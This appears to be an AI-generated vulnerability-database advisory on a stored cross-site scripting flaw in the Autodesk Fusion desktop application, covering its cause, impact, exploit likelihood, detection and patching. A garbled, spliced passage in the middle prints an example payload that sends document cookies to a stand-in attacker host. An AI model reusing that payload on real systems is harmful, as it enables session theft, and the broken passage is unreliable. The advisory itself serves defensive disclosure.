
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-0533 is a Stored Cross-Site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A maliciously crafted HTML payload embedded in a design name is rendered unsanitized within the delete confirmation dialog; if a user clicks on it, the payload executes arbitrary code in the context of the running process. All Autodesk Fusion versions prior to 2606.1.21 are affected. The CVE was published on January 22, 2026, with a patch released by January 30, 2026. It carries a CVSS v3.1 base score of 8.1 (High), as assigned by Autodesk (Autodesk Advisory, NVD).
The root cause is improper neutralization of user-supplied input during HTML page generation (CWE-79), specifically within the design name field of the Autodesk Fusion desktop application. When a user initiates a delete action on a design whose name contains a malicious HTML/JavaScript payload, the application renders the name without sanitization in the confirmation dialog, allowing the script to execute. Exploitation requires that an attacker first be able to supply or share a maliciously named design file with the victim — for example, via a shared project or a crafted file sent through collaboration channels — and that the victim then attempt to delete the design and interact with the dialog. No public proof-of-concept exploit code has been identified (Autodesk Advisory, NVD).
Successful exploitation allows an attacker to execute arbitrary code or read local files within the security context of the Autodesk Fusion process, resulting in high confidentiality and integrity impact. An attacker could exfiltrate sensitive design data, local files accessible to the Fusion process, or perform unauthorized actions on the victim's system. Availability is not directly impacted, and the scope is limited to the affected process (unchanged scope), but the potential for data theft and code execution on engineering workstations — which may hold proprietary design IP — represents a significant business risk (Autodesk Advisory, NVD).
As of the time of reporting, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (Autodesk Advisory). The vulnerability has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.022% (0.000220), indicating a very low probability of exploitation in the near term. Exploitation requires user interaction — specifically, a victim must attempt to delete a maliciously named design and click within the confirmation dialog — which limits opportunistic exploitation.
<img src=x onerror=fetch('http://attacker.com/?f='+document.cookie)> or a payload that reads local files via the application's file access APIs)..f3d, .f3z, or project files) with names containing HTML tags, JavaScript syntax, or unusual special characters (e.g., <, >, script, onerror, onload).Fusion360.exe or equivalent) to external or unknown IP addresses, particularly shortly after a user interacts with a delete confirmation dialog.Autodesk has released a patch in Autodesk Fusion version 2606.1.21; all users should upgrade immediately (Autodesk Advisory). Patched installers are available for both Windows and macOS via Autodesk's official download links. For users unable to patch immediately: exercise caution when opening or deleting designs received from untrusted sources, avoid clicking on suspicious or unexpected text within confirmation dialogs, and inspect design names for HTML-like syntax or special characters before deletion. Organizations should also consider restricting design sharing permissions to trusted collaborators until the patch is applied.
The vulnerability was noted in CISA's weekly vulnerability bulletin (week of January 19, 2026) and covered by security aggregators including Red Packet Security and VulnDB (CISA Bulletin, Red Packet Security). No significant independent researcher commentary or social media discussion has been identified beyond standard CVE aggregation and alerting.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."